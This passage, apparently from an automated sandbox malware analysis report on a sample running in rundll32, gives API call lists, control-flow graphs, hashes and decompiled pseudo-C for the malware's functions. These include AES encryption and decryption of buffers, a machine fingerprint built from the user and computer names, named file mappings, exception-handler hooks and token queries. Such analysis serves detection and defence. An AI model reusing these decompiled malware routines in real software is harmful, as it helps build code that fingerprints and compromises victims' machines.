78->83 79->68 91 5586ad5-5586ad6 79->91 82->79 87 5586a78-5586a9f wsprintfA 82->87 83->82 89 55869f8-5586a0b call 558e3f3 85->89 90 55869c9-55869f3 call 5577b4a 85->90 86->85 87->79 89->14 95 5586a11-5586a1a 89->95 90->89 91->12 95->71 96 5586a1c-5586a26 call 5583b58 95->96 96->71
                                                          APIs
                                                          • RtlInitializeCriticalSection.NTDLL(0559C328), ref: 05586675
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • memset.NTDLL ref: 055866A6
                                                          • RtlInitializeCriticalSection.NTDLL(059BB148), ref: 055866B7
                                                            • Part of subcall function 0558AA55: RtlInitializeCriticalSection.NTDLL(0559C300), ref: 0558AA79
                                                            • Part of subcall function 0558AA55: RtlInitializeCriticalSection.NTDLL(0559C2E0), ref: 0558AA8F
                                                            • Part of subcall function 0558AA55: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,05592B24), ref: 0558AAA0
                                                            • Part of subcall function 0558AA55: GetModuleHandleA.KERNEL32(0000170B), ref: 0558AAD4
                                                            • Part of subcall function 0559324E: RtlAllocateHeap.NTDLL(00000000,-00000003,77A19EB0), ref: 05593268
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060), ref: 055866E0
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,05592B24), ref: 055866F1
                                                          • CloseHandle.KERNEL32(000003F4), ref: 05586705
                                                          • GetUserNameA.ADVAPI32(00000000,?), ref: 0558674E
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05586761
                                                          • GetUserNameA.ADVAPI32(00000000,?), ref: 05586776
                                                          • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 055867A6
                                                          • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 055867BB
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,05592B24), ref: 055867C5
                                                          • CloseHandle.KERNEL32(00000000), ref: 055867D2
                                                          • GetShellWindow.USER32 ref: 055867ED
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 055867F4
                                                          • memcpy.NTDLL(0559C1E4,?,00000018), ref: 05586830
                                                          • CreateEventA.KERNEL32(0559C1A8,00000001,00000000,00000000,?,00000001), ref: 055868B3
                                                          • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 055868DD
                                                          • OpenEventA.KERNEL32(00100000,00000000,059BA9E0), ref: 05586905
                                                          • CreateEventA.KERNEL32(0559C1A8,00000001,00000000,059BA9E0), ref: 05586918
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,05592B24), ref: 0558691E
                                                          • GetLastError.KERNEL32(0558C5EB,0559C0FC,0559C100), ref: 055869A4
                                                          • LoadLibraryA.KERNEL32(?,0558C5EB,0559C0FC,0559C100), ref: 055869BF
                                                          • SetEvent.KERNEL32(?,Function_000035E1,00000000,00000000), ref: 05586A54
                                                          • RtlAllocateHeap.NTDLL(00000000,00000052,Function_000035E1), ref: 05586A69
                                                          • wsprintfA.USER32 ref: 05586A99
                                                            • Part of subcall function 0558DA6E: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 0558DAE4
                                                            • Part of subcall function 05580C6E: HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 05580CDF
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Allocate$CriticalErrorEventInitializeLastSection$CreateHandleProcess$CloseFreeNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                                                          • String ID:
                                                          • API String ID: 2659885799-0
                                                          • Opcode ID: 207d43347ae3d298452ef4f88489ac6cf53e220782781c6bfd61fd66a80c715d
                                                          • Instruction ID: c46076cc4551a889c4dd070aa2515a3d41de0aa342f0a0a91e8a82250a27c1d4
                                                          • Opcode Fuzzy Hash: 207d43347ae3d298452ef4f88489ac6cf53e220782781c6bfd61fd66a80c715d
                                                          • Instruction Fuzzy Hash: F9C1A070614305DFDB20EF65E84A93A7BE9FB54700B52481EF146E7240DF39A848EF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E53276, Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 217 e53276-e532b6 CryptAcquireContextW 218 e5340d-e53413 GetLastError 217->218 219 e532bc-e532f8 memcpy CryptImportKey 217->219 222 e53416-e5341d 218->222 220 e532fe-e53310 CryptSetKeyParam 219->220 221 e533f8-e533fe GetLastError 219->221 223 e533e4-e533ea GetLastError 220->223 224 e53316-e5331f 220->224 225 e53401-e5340b CryptReleaseContext 221->225 228 e533ed-e533f6 CryptDestroyKey 223->228 226 e53327-e53334 call e55fbc 224->226 227 e53321-e53323 224->227 225->222 232 e533db-e533e2 226->232 233 e5333a-e53343 226->233 227->226 229 e53325 227->229 228->225 229->226 232->228 234 e53346-e5334e 233->234 235 e53350 234->235 236 e53353-e53370 memcpy 234->236 235->236 237 e53372-e53389 CryptEncrypt 236->237 238 e5338b-e5339a CryptDecrypt 236->238 239 e533a0-e533a2 237->239 238->239 240 e533a4-e533ae 239->240 241 e533b2-e533bd GetLastError 239->241 240->234 244 e533b0 240->244 242 e533d1-e533d9 call e513cc 241->242 243 e533bf-e533cf 241->243 242->228 243->228 244->243
                                                          C-Code - Quality: 58%
                                                          			E00E53276(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0xe5a0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0xe5a0b8() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E00E55FBC(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0xe5a0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E00E513CC(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                                                          0x00e5327f
                                                          0x00e53285
                                                          0x00e53288
                                                          0x00e5328e
                                                          0x00e5328e
                                                          0x00e53290
                                                          0x00e53292
                                                          0x00e53295
                                                          0x00e5329b
                                                          0x00e5329c
                                                          0x00e5329d
                                                          0x00e532a3
                                                          0x00e532a8
                                                          0x00e532ae
                                                          0x00e532b6
                                                          0x00e53413
                                                          0x00e532bc
                                                          0x00e532be
                                                          0x00e532c7
                                                          0x00e532cc
                                                          0x00e532de
                                                          0x00e532e1
                                                          0x00e532e5
                                                          0x00e532ec
                                                          0x00e532f0
                                                          0x00e532f8
                                                          0x00e533fe
                                                          0x00e532fe
                                                          0x00e532fe
                                                          0x00e53302
                                                          0x00e53303
                                                          0x00e53305
                                                          0x00e53310
                                                          0x00e533ea
                                                          0x00e53316
                                                          0x00e53316
                                                          0x00e53319
                                                          0x00e5331f
                                                          0x00e53325
                                                          0x00e53325
                                                          0x00e5332d
                                                          0x00e53331
                                                          0x00e53334
                                                          0x00e533db
                                                          0x00e5333a
                                                          0x00e53340
                                                          0x00e53343
                                                          0x00e53346
                                                          0x00e53348
                                                          0x00e5334b
                                                          0x00e5334e
                                                          0x00e53350
                                                          0x00e53350
                                                          0x00e5335a
                                                          0x00e5335f
                                                          0x00e53362
                                                          0x00e53365
                                                          0x00e53367
                                                          0x00e53370
                                                          0x00e5339a
                                                          0x00e53372
                                                          0x00e53383
                                                          0x00e53383
                                                          0x00e533a2
                                                          0x00000000
                                                          0x00000000
                                                          0x00e533a4
                                                          0x00e533a7
                                                          0x00e533aa
                                                          0x00e533ae
                                                          0x00000000
                                                          0x00e533b0
                                                          0x00e533bf
                                                          0x00e533c5
                                                          0x00e533cd
                                                          0x00e533cd
                                                          0x00000000
                                                          0x00e533ae
                                                          0x00e533b2
                                                          0x00e533ba
                                                          0x00e533bd
                                                          0x00e533d4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e533bd
                                                          0x00e53334
                                                          0x00e533ed
                                                          0x00e533f0
                                                          0x00e533f0
                                                          0x00e53405
                                                          0x00e53405
                                                          0x00e5341d

                                                          APIs
                                                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00E56E82,00000001,00E54A9F,00000000), ref: 00E532AE
                                                          • memcpy.NTDLL(00E56E82,00E54A9F,00000010,?,?,?,00E56E82,00000001,00E54A9F,00000000,?,00E571BA,00000000,00E54A9F,?,00000000), ref: 00E532C7
                                                          • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00E532F0
                                                          • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00E53308
                                                          • memcpy.NTDLL(00000000,00000000,051B9630,00000010), ref: 00E5335A
                                                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,051B9630,00000020,?,?,00000010), ref: 00E53383
                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,051B9630,?,?,00000010), ref: 00E5339A
                                                          • GetLastError.KERNEL32(?,?,00000010), ref: 00E533B2
                                                          • GetLastError.KERNEL32 ref: 00E533E4
                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 00E533F0
                                                          • GetLastError.KERNEL32 ref: 00E533F8
                                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00E53405
                                                          • GetLastError.KERNEL32(?,?,?,00E56E82,00000001,00E54A9F,00000000,?,00E571BA,00000000,00E54A9F,?,00000000,00E54A9F,00000000,051B9630), ref: 00E5340D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                                          • String ID:
                                                          • API String ID: 1967744295-0
                                                          • Opcode ID: 5c5b585367fc19cefd0de8a0849283e1cd4598d550815bac225f9cefeb7067d7
                                                          • Instruction ID: 7adf6b87320e5603648fabf48e3fedc1f00d2563d6db7a805ed1405dd5aeb4df
                                                          • Opcode Fuzzy Hash: 5c5b585367fc19cefd0de8a0849283e1cd4598d550815bac225f9cefeb7067d7
                                                          • Instruction Fuzzy Hash: 6F515D71900208FFDB109FA5DC84AEEBBB8EB04396F148825F921F6250D7719E189B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E56CD6, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 275 e56cd6-e56cea 276 e56cf4-e56d06 call e559cb 275->276 277 e56cec-e56cf1 275->277 280 e56d08-e56d18 GetUserNameW 276->280 281 e56d5a-e56d67 276->281 277->276 282 e56d69-e56d80 GetComputerNameW 280->282 283 e56d1a-e56d2a RtlAllocateHeap 280->283 281->282 285 e56d82-e56d93 RtlAllocateHeap 282->285 286 e56dbe-e56de0 282->286 283->282 284 e56d2c-e56d39 GetUserNameW 283->284 287 e56d49-e56d58 HeapFree 284->287 288 e56d3b-e56d47 call e556bf 284->288 285->286 289 e56d95-e56d9e GetComputerNameW 285->289 287->282 288->287 290 e56da0-e56dac call e556bf 289->290 291 e56daf-e56db8 HeapFree 289->291 290->291 291->286
                                                          C-Code - Quality: 97%
                                                          			E00E56CD6(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				intOrPtr _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xe5a2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E00E559CB( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xe5a2d0 ^ 0x46d76429;
				} else {
					_t5 =  &_v8; // 0xe5453b
					GetUserNameW(0, _t5);
					_t6 =  &_v8; // 0xe5453b
					_t50 =  *_t6;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xe5a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							_t7 =  &_v8; // 0xe5453b
							if(GetUserNameW(_t62, _t7) != 0) {
								_t8 =  &_v8; // 0xe5453b
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E00E556BF( *_t8 +  *_t8, _t63);
							}
							HeapFree( *0xe5a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xe5a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E00E556BF(_v8 + _v8, _t63);
						}
						HeapFree( *0xe5a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                                                          0x00e56cd6
                                                          0x00e56cde
                                                          0x00e56ce4
                                                          0x00e56ce7
                                                          0x00e56cea
                                                          0x00e56cec
                                                          0x00e56cf1
                                                          0x00e56cf1
                                                          0x00e56cf7
                                                          0x00e56cf9
                                                          0x00e56d06
                                                          0x00e56d67
                                                          0x00e56d08
                                                          0x00e56d08
                                                          0x00e56d0d
                                                          0x00e56d13
                                                          0x00e56d13
                                                          0x00e56d18
                                                          0x00e56d26
                                                          0x00e56d2a
                                                          0x00e56d2c
                                                          0x00e56d39
                                                          0x00e56d3b
                                                          0x00e56d40
                                                          0x00e56d47
                                                          0x00e56d47
                                                          0x00e56d52
                                                          0x00e56d52
                                                          0x00e56d2a
                                                          0x00e56d18
                                                          0x00e56d69
                                                          0x00e56d6f
                                                          0x00e56d79
                                                          0x00e56d7b
                                                          0x00e56d80
                                                          0x00e56d8f
                                                          0x00e56d93
                                                          0x00e56d9e
                                                          0x00e56da5
                                                          0x00e56dac
                                                          0x00e56dac
                                                          0x00e56db8
                                                          0x00e56db8
                                                          0x00e56d93
                                                          0x00e56dc1
                                                          0x00e56dc3
                                                          0x00e56dc6
                                                          0x00e56dc8
                                                          0x00e56dcb
                                                          0x00e56dce
                                                          0x00e56dd8
                                                          0x00e56ddc
                                                          0x00e56de0

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,;E), ref: 00E56D0D
                                                          • RtlAllocateHeap.NTDLL(00000000,;E), ref: 00E56D24
                                                          • GetUserNameW.ADVAPI32(00000000,;E), ref: 00E56D31
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00E5453B,?,?,?,?,?,00E568F7,?,00000001), ref: 00E56D52
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00E56D79
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00E56D8D
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00E56D9A
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00E56DB8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID: ;E$;E
                                                          • API String ID: 3239747167-563190114
                                                          • Opcode ID: ae3d7d9163a74c488ddc249364e091d3c1aace7990f787923d93b91e991a2125
                                                          • Instruction ID: d318bfc2458706597f6b30a61194a072df31bcad4da8750bf516a1104d9b25e9
                                                          • Opcode Fuzzy Hash: ae3d7d9163a74c488ddc249364e091d3c1aace7990f787923d93b91e991a2125
                                                          • Instruction Fuzzy Hash: EB315C76A00209EFDB11DFAADC81AAEB7F9FB44306F544C29E905E7261D770DE089B11
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E566CE, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          C-Code - Quality: 74%
                                                          			E00E566CE(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00E57DD6();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xe5a2d4; // 0x435d5a8
				_t5 = _t13 + 0xe5b84d; // 0x51b8df5
				_t6 = _t13 + 0xe5b580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00E57ABA();
				_t17 = CreateFileMappingW(0xffffffff, 0xe5a2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                          0x00e566ce
                                                          0x00e566d6
                                                          0x00e566da
                                                          0x00e566e0
                                                          0x00e566e5
                                                          0x00e566ea
                                                          0x00e566ed
                                                          0x00e566f0
                                                          0x00e566f5
                                                          0x00e566f6
                                                          0x00e566f9
                                                          0x00e566fe
                                                          0x00e56705
                                                          0x00e5670f
                                                          0x00e56711
                                                          0x00e56712
                                                          0x00e56715
                                                          0x00e56731
                                                          0x00e56737
                                                          0x00e5673b
                                                          0x00e56789
                                                          0x00e5673d
                                                          0x00e5674a
                                                          0x00e5675a
                                                          0x00e56762
                                                          0x00e56774
                                                          0x00e56778
                                                          0x00000000
                                                          0x00000000
                                                          0x00e56764
                                                          0x00e56767
                                                          0x00e5676c
                                                          0x00e5676e
                                                          0x00e5676e
                                                          0x00e5674c
                                                          0x00e5674e
                                                          0x00e5677a
                                                          0x00e5677b
                                                          0x00e5677b
                                                          0x00e5674a
                                                          0x00e56790

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00E543F5,?,00000001,?), ref: 00E566DA
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00E566F0
                                                          • _snwprintf.NTDLL ref: 00E56715
                                                          • CreateFileMappingW.KERNELBASE(000000FF,00E5A2F8,00000004,00000000,00001000,?), ref: 00E56731
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E543F5,?), ref: 00E56743
                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00E5675A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E543F5), ref: 00E5677B
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E543F5,?), ref: 00E56783
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: eb527a70265ad87d89e7a18cde604b90a796c383884b27f96ba2bc187f889c56
                                                          • Instruction ID: 253c5dd13b37c4200b650fab1d9811f4596de6fb27aeb8754b482bc143d519b1
                                                          • Opcode Fuzzy Hash: eb527a70265ad87d89e7a18cde604b90a796c383884b27f96ba2bc187f889c56
                                                          • Instruction Fuzzy Hash: 0B210276600204FFCB249BA4DC05FDE7BB9AB48756F240922FE05FB1D1EB7099098B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05592A09, Relevance: 12.1, APIs: 8, Instructions: 114stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 356 5592a09-5592a46 ConvertStringSecurityDescriptorToSecurityDescriptorA 357 5592a48-5592a56 StrRChrA 356->357 358 5592a82-5592aac call 558b58c 356->358 359 5592a58-5592a59 357->359 360 5592a5b 357->360 365 5592aca-5592ad2 358->365 366 5592aae-5592ab2 358->366 362 5592a61-5592a7c _strupr lstrlen call 557b305 359->362 360->362 362->358 369 5592ad9-5592af7 CreateEventA 365->369 370 5592ad4-5592ad7 365->370 366->365 368 5592ab4-5592abf 366->368 368->365 371 5592ac1-5592ac8 368->371 373 5592af9-5592b00 call 557c43d 369->373 374 5592b2b-5592b31 GetLastError 369->374 372 5592b37-5592b3e 370->372 371->365 371->371 377 5592b4d-5592b52 372->377 378 5592b40-5592b47 RtlRemoveVectoredExceptionHandler 372->378 373->374 380 5592b02-5592b09 373->380 376 5592b33-5592b35 374->376 376->372 376->377 378->377 381 5592b0b-5592b17 RtlAddVectoredExceptionHandler 380->381 382 5592b1c-5592b1f call 5586657 380->382 381->382 384 5592b24-5592b29 382->384 384->374 384->376
                                                          APIs
                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,0559C1AC,00000000), ref: 05592A37
                                                          • StrRChrA.SHLWAPI(059BA5B0,00000000,0000005C,00000000,00000001,?,0559C16C,00000000,?), ref: 05592A4C
                                                          • _strupr.NTDLL ref: 05592A62
                                                          • lstrlen.KERNEL32(059BA5B0), ref: 05592A6A
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,0559C16C,00000000,?), ref: 05592AEA
                                                          • RtlAddVectoredExceptionHandler.NTDLL(00000000,05573E36), ref: 05592B11
                                                          • GetLastError.KERNEL32(?), ref: 05592B2B
                                                          • RtlRemoveVectoredExceptionHandler.NTDLL(00F505B8), ref: 05592B41
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: DescriptorExceptionHandlerSecurityVectored$ConvertCreateErrorEventLastRemoveString_struprlstrlen
                                                          • String ID:
                                                          • API String ID: 1098824789-0
                                                          • Opcode ID: 3a267bb63e5323356fa898c2ae86bcf675a475ccfaee28dd7cab2ec6910018b6
                                                          • Instruction ID: 30e9f476bdb27d972c85bb571abebce1c02a8854f370b4d380192df4291b5249
                                                          • Opcode Fuzzy Hash: 3a267bb63e5323356fa898c2ae86bcf675a475ccfaee28dd7cab2ec6910018b6
                                                          • Instruction Fuzzy Hash: 08312972A10215AFDF14AF74988AA7E7FA8F704350F06052BF512E3141DF7C5C48AB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558B58C, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 0558B5D3
                                                          • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0558B5E6
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 0558B602
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 0558B61F
                                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 0558B62C
                                                          • NtClose.NTDLL(?), ref: 0558B63E
                                                          • NtClose.NTDLL(?), ref: 0558B648
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: b323316cf661dc386b6d3580f4332577157db930a4dec63be1c8e68e1b59a8b2
                                                          • Instruction ID: 394d3289fa2cf447a46544f85e652b7d00979cc3313adccdd1650ba6a70e9e9c
                                                          • Opcode Fuzzy Hash: b323316cf661dc386b6d3580f4332577157db930a4dec63be1c8e68e1b59a8b2
                                                          • Instruction Fuzzy Hash: 9B210572A10219BBDF01AFA5DC45EEEBFBDFB48750F104026F901B6110D7719A489BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E540DC, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E00E540DC(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
